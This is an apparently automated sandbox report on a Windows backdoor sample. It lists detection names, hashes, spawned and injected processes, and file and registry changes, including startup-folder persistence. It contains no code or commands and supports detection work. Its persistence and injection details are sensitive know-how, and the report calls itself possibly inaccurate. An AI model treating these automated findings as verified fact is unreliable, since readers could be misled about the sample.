Trojan.Win32.Crypt.ekm (Kaspersky), Win32.HLLM.Reset.493 (DrWeb), Trojan-FIQV!BC6C713511C1 (McAfee), Win32:Malware-gen (Avast), Backdoor.Win32.Farfli.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan.Win32.Alureon.FD, mzpefinder_pcap_file.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Backdoor, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: c7eaad28523b7779f03e73b9525a99ab
SHA1: a145f33f1327ccae9259a16585428b94e97a8a2a
SHA256: abc6b317823823e70e73bf6fccfbacd58cfb49dc7764acb0ef3c782334e6f95d
SSDeep: 3072:SBu5NoDxvM1GjiUfMvbhINwp5JvvoO5 kbF6lnc7uvP5OiBK oCP23zAc2WzKIQ7:SwoD1kG Uohr5JvAOZR6Nca35FBuNK57
Size: 218880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-05-16 13:41:12
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
AdbeRdr1012_en_US.exe:2908
verclsid.exe:3340
verclsid.exe:3280
verclsid.exe:3208
U78n983:2324
MsiExec.exe:2132
MsiExec.exe:3836
MsiExec.exe:432
setup.exe:3420
Adobe_Updater.exe:3104
%original file name%.exe:1676
csslisog.exe:1780
csslisog.exe:3908
The Backdoor injects its code into the following process(es):
vmacthlp.exe:892
svchost.exe:1980
svchost.exe:1512
Explorer.EXE:532
services.exe:724
lsass.exe:736
svchost.exe:904
svchost.exe:988
wmiprvse.exe:1068
svchost.exe:1084
svchost.exe:1128
svchost.exe:1180
spoolsv.exe:1424
jqs.exe:1640
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process AdbeRdr1012_en_US.exe:2908 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Data1.cab (895790 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\Setup.ini (498 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AcroRead.msi (15021 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\config.bin (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\RDC.bin (114531 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\setup.exe (9595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AdobeSFX.log (6393 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AdbeRdrUpd1012.msp (115622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\installer.bin (286043 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\ABCPY.INI (1 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\25109 (0 bytes)
%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\15833.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\config.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\RDC.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\22395.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25109\installer.bin (0 bytes)
The process U78n983:2324 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (1281 bytes)
The process MsiExec.exe:3836 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~1B.tmp (968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (422180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (422180 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001}\FixTransforms.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-AA1000000001} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{AC76BA86-7AD7-1033-7B44-A93000000001}\FixTransforms.exe (0 bytes)
%System%\Elevation.tmp (0 bytes)
The process MsiExec.exe:432 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
C:\ (8 bytes)
%Documents and Settings%\%current user%\Favorites (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (8 bytes)
%Program Files%\Common Files\System\ado\msadrh15.dll.new (114 bytes)
%Program Files%\Common Files\System\directdb.dll.new (1202 bytes)
%Program Files%\Common Files\System\Ole DB\msdaosp.dll (2854 bytes)
%System%\dllcache\msdaenum.dll.new (8 bytes)
%Program Files%\Common Files\System\Ole DB\msdaps.dll (4038 bytes)
%Program Files%\Internet Explorer\Connection Wizard (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\updater.log (10010 bytes)
%Documents and Settings%\ALL USERS (4 bytes)
%Program Files%\Common Files\VMware\Drivers\scsi (4 bytes)
%System%\dllcache\msader15.dll.new (48 bytes)
%Program Files%\Common Files\VMware\Drivers\Virtual Printer\TPOG3\i386 (4 bytes)
%Documents and Settings%\All Users\Documents\My Music (4 bytes)
%Program Files%\Common Files\System\Ole DB\msdaora.dll (4646 bytes)
%System%\dllcache\dao360.dll (6722 bytes)
%Program Files%\Common Files\Microsoft Shared\Speech\sapi.dll (20934 bytes)
%Program Files%\Common Files\Java\JAVA UPDATE (4 bytes)
%Program Files%\Common Files\System\wab32.dll (11654 bytes)
%Program Files%\Internet Explorer\Connection Wizard\RCX16B.tmp (1429 bytes)
%System%\dllcache\msaddsr.dll (48 bytes)
%System%\dllcache\msdadc.dll (8 bytes)
%Program Files%\Common Files\Adobe\ARM\1.0 (4 bytes)
%Program Files%\Internet Explorer\Connection Wizard\inetwiz.exe (2566 bytes)
%Program Files%\Common Files\System\msadc\msdarem.dll (4214 bytes)
%Program Files%\Common Files\System\ado\msjro.dll (4056 bytes)
%Documents and Settings%\%current user% (4 bytes)
%WinDir%\Temp\Perflib_Perfdata_668.dat (4 bytes)
%Program Files%\Common Files\Adobe\Acrobat\ActiveX (4 bytes)
%Program Files%\Common Files\System (44 bytes)
%System%\dllcache\msdasc.dll.new (8 bytes)
%Program Files%\Common Files\System\Ole DB\msdaora.dll.new (2562 bytes)
%Program Files%\Common Files\System\msadc\msdfmap.dll (2638 bytes)
%Documents and Settings%\All Users\Start Menu\Programs (4 bytes)
%Program Files%\Common Files\System\msadc (16 bytes)
%Program Files%\Common Files\System\Ole DB\msdatl3.dll.new (1202 bytes)
%Program Files%\Common Files\MSSoap\Binaries\Resources\1033\mssoapr.dll (23 bytes)
%Documents and Settings%\%current user%\SendTo (4 bytes)
%Program Files%\Common Files\System\Ole DB\sqloledb.dll (10886 bytes)
%Program Files%\Common Files\System\ado\msado15.dll (10134 bytes)
%Program Files%\Internet Explorer (12 bytes)
%WinDir%\Prefetch\PERL.EXE-28C02382.pf (1202 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\PLUG_INS3D (4 bytes)
%Program Files%\Common Files\Microsoft Shared\DW (4 bytes)
%System%\dllcache\msadcor.dll.new (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\trialoc.dll (2566 bytes)
%WinDir% (288 bytes)
%Program Files%\Adobe\Reader 10.0\Reader (300 bytes)
%Program Files%\Common Files\System\Ole DB\msdatl3.dll (2854 bytes)
C:\$Directory (4 bytes)
%System%\dllcache (13576 bytes)
%Program Files%\Internet Explorer\IEXPLORE.EXE (2854 bytes)
%Program Files%\Common Files\System\msadc\msadcs.dll (2854 bytes)
C:\PROGRAM FILES (4 bytes)
%Program Files%\Common Files\System\msadc\msadco.dll.new (1346 bytes)
%Program Files%\Common Files\System\Ole DB\oledb32.dll (5488 bytes)
%Program Files%\Common Files\Microsoft Shared\Speech\sapisvr.exe (2638 bytes)
%System%\config (100 bytes)
%Documents and Settings%\All Users\Start Menu (4 bytes)
%WinDir%\Installer\$PatchCache$\Managed (4 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwhelp.dll (3552 bytes)
%Program Files%\Common Files\VMware\Drivers\vmxnet3 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data (8 bytes)
%Program Files%\Common Files\System\ado\msadomd.dll (5384 bytes)
%Program Files%\Common Files\System\msadc\msadds.dll (4952 bytes)
%Program Files%\Common Files\System\ado\msado15.dll.new (6722 bytes)
%Program Files%\Common Files\System\Ole DB\sqlxmlx.dll (4646 bytes)
%Program Files%\Common Files\MSSoap\Binaries\wisc10.dll (2566 bytes)
%Program Files%\Common Files\System\msadc\msdarem.dll.new (1202 bytes)
%System%\dllcache\fp4autl.dll (8370 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mtjjyklc.log (4 bytes)
%System%\dllcache\msdaorar.dll (32 bytes)
%Program Files%\Internet Explorer\iedw.exe (2566 bytes)
%Program Files%\Common Files\MSSoap\Binaries\mssoap1.dll (6600 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwutil.dll (2854 bytes)
%System% (1840 bytes)
%System%\config\SysEvent.Evt (4000 bytes)
%Program Files%\COMMON FILES (12 bytes)
%Program Files%\Common Files\SpeechEngines\Microsoft\TTS\1033\spttseng.dll (25656 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwconn2.exe (4830 bytes)
%Program Files%\Common Files\Microsoft Shared (16 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%Program Files%\Common Files\Microsoft Shared\VGX\vgx.dll (15042 bytes)
%Program Files%\Common Files\System\ado\msadox.dll (4038 bytes)
%Program Files%\Common Files\System\Ole DB\msdaosp.dll.new (1202 bytes)
%Program Files%\Common Files\Microsoft Shared\OFFICE14\1033 (4 bytes)
%WinDir%\Prefetch (1152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~1B.tmp (676 bytes)
%Program Files%\Adobe\Reader 10.0\Reader\plug_ins (4 bytes)
%Program Files%\Common Files\System\ado (12 bytes)
%Program Files%\Common Files\System\msadc\msadco.dll (3608 bytes)
%Program Files%\Common Files\System\directdb.dll (2854 bytes)
%Program Files%\Common Files\System\msadc\msadcs.dll.new (106 bytes)
%Program Files%\Common Files\MSSoap\Binaries\wisc10.dll.new (56 bytes)
%Program Files%\Common Files\System\Ole DB\MSDAIPP.DLL (10886 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwconn1.exe (4646 bytes)
%Program Files%\Common Files\Microsoft Shared\OFFICE14 (4 bytes)
%Program Files%\Common Files\System\Ole DB\msdaps.dll.new (2562 bytes)
%Program Files%\Common Files\System\Ole DB\msdasql.dll (6918 bytes)
%Program Files%\Common Files\System\ado\msadox.dll.new (2562 bytes)
%Program Files%\Common Files\System\Ole DB (28 bytes)
%Program Files%\Common Files\SpeechEngines\Microsoft\spcommon.dll (4056 bytes)
%Program Files%\Common Files\System\msadc\msadce.dll (6726 bytes)
%WinDir%\Installer (96 bytes)
%Program Files%\Common Files\System\Ole DB\oledb32r.dll (65 bytes)
%Documents and Settings%\%current user%\Local Settings (12 bytes)
%WinDir%\inf (400 bytes)
%System%\dllcache\msdaer.dll.new (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\7fe17d887612.log (578 bytes)
%Program Files%\Common Files\System\ado\msador15.dll (2968 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aumLib.log (1203 bytes)
%Program Files%\Common Files\System\msadc\msadcf.dll (2854 bytes)
%Program Files%\Common Files\System\msadc\msdaprst.dll.new (2562 bytes)
%Program Files%\Common Files\Microsoft Shared\Triedit\triedit.dll (1346 bytes)
%Program Files%\Adobe\Reader 10.0\Resource (4 bytes)
%Program Files%\Common Files\Microsoft Shared\MSInfo\msinfo32.exe (1440 bytes)
%System%\dllcache\mssoapr.dll (48 bytes)
%Program Files%\Common Files\System\msadc\msdaprst.dll (4038 bytes)
%Program Files%\Common Files\VMware\Drivers\VIDEO_XPDM (4 bytes)
%Program Files%\Common Files\VMware\Drivers\vmxnet (8 bytes)
%System%\dllcache\msdaprsr.dll.new (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\icwdl.dll (2566 bytes)
%Program Files%\Internet Explorer\HMMAPI.DLL (2566 bytes)
%System%\dllcache\msdasqlr.dll (32 bytes)
%Program Files%\Internet Explorer\Connection Wizard\isignup.exe (2566 bytes)
C:\Config.Msi (868 bytes)
%System%\dllcache\msdaremr.dll.new (32 bytes)
%Program Files%\Common Files\Microsoft Shared\Triedit\TRIEDIT.DLL (872 bytes)
%Program Files%\Common Files\System\Ole DB\RCX15F.tmp (3365 bytes)
%Program Files%\Common Files\System\ado\msadrh15.dll (2854 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Adobe\Updater6\AdobeESDGlobalApps.xml (0 bytes)
The process Adobe_Updater.exe:3104 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (1088 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\aum.log (2309 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\AdobeUpdaterPrefs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\crl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\Data (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\ESD (0 bytes)
The process %original file name%.exe:1676 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\csslisog.exe (1281 bytes)
The process csslisog.exe:1780 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kqmtqgym\swegbgid.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jyabgndb.exe (1281 bytes)
Registry activity
The process AdbeRdr1012_en_US.exe:2908 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C AD 33 32 65 81 C0 11 CF 1D 02 B9 FC 04 1B 9F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process verclsid.exe:3340 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 AD 5B 8E 8F 08 8A 56 5A A2 C0 B8 24 98 2B 75"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process verclsid.exe:3280 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 2A 12 F0 89 EF 9E 10 56 9A D8 C4 AC F5 E8 70"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process verclsid.exe:3208 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 1E BA C0 23 75 76 DD FC E0 0D DC 37 44 18 53"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process U78n983:2324 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 43 A5 91 06 D5 EA EF 2F 5E B2 DB 95 CD 86 A2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process MsiExec.exe:2132 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CB 76 12 1E 4B C6 63 FF F7 7E 96 B4 C5 FC D9 9C"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process MsiExec.exe:3836 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 B8 C3 9C 30 C0 68 40 67 F0 BD 3E C5 75 7A CA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Netscape\Netscape Navigator\Viewers]
"TYPE37" = "application/vnd.adobe.xdp"
"TYPE36" = "application/vnd.rmf"
"TYPE35" = "application/vnd.adobe.xfdf"
"TYPE34" = "application/vnd.fdf"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The Backdoor deletes the following registry key(s):
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
[HKLM\SOFTWARE\Adobe\Installer]
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Netscape\Netscape Navigator\Viewers]
"TYPE37"
"TYPE36"
"TYPE35"
"TYPE34"
The process MsiExec.exe:432 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"SetupCacheExport" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"OriginalDatabase" = "%WinDir%\Installer\174e13.msi"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"reader" = "%Program Files%\Adobe\Reader 10.0\Reader\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"ProductName" = "Adobe Reader X (10.1.2)"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"WindowsFolder" = "%WinDir%\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"ProductName" = "Adobe Reader 9.3.4"
"DeleteUpdateFolder" = "Yes"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"AllUsers" = "1"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"DefragResetProgress" = "No"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"DefragResetProgress" = "No"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"OriginalDatabase" = "%Documents and Settings%\All Users\Application Data\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AA1000000001}\AcroRead.msi"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"CACHE_DIR" = "%Program Files%\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A93000000001}\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"CACHE_DIR" = "%Program Files%\Adobe\Reader 10.0\Setup Files\{AC76BA86-7AD7-1033-7B44-AA1000000001}\"
"DeleteUpdateFolder" = "Yes"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"SetupCacheExport" = ""
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"ALLUSERS_APPDATA_ADOBE" = "%Documents and Settings%\All Users\Application Data\Adobe\"
"ReinstallMode" = "omus"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"plug_ins" = "%Program Files%\Adobe\Reader 9.0\Reader\plug_ins\"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 F8 D9 0B DA 36 40 B0 DB 1A 1B 2A C9 01 69 D3"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"ACTIVE_X" = "%Program Files%\Common Files\Adobe\Acrobat\ActiveX\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"plug_ins" = "%Program Files%\Adobe\Reader 10.0\Reader\plug_ins\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Common Files\Adobe\Acrobat\ActiveX,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\acrobat\shell\open\ddeexec\application]
"(Default)" = "AcroViewR10"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"ReinstallMode" = "omus"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"WindowsFolder" = "%WinDir%\"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"remove" = "ALL"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-AA1000000001}]
"DEFAULT_VERB" = "Read"
"ProductCode" = "{AC76BA86-7AD7-1033-7B44-AA1000000001}"
[HKLM\SOFTWARE\Adobe\Acrobat Reader\10.0\Installer\Optimization]
"DefragStatus" = "1"
[HKLM\SOFTWARE\Adobe\Installer\{AC76BA86-7AD7-1033-7B44-A93000000001}]
"AllUsers" = "1"
The Backdoor deletes the following value(s) in system registry:
The Backdoor disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader Synchronizer"
The process setup.exe:3420 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 6E CF 7C BF A4 24 AC 72 89 DD D2 77 28 D9 AF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process vmacthlp.exe:892 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%System%\config\systemprofile\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process Adobe_Updater.exe:3104 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 1A 23 F9 3C 7A EE 5A 70 7F 88 93 DA 69 D1 F8"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
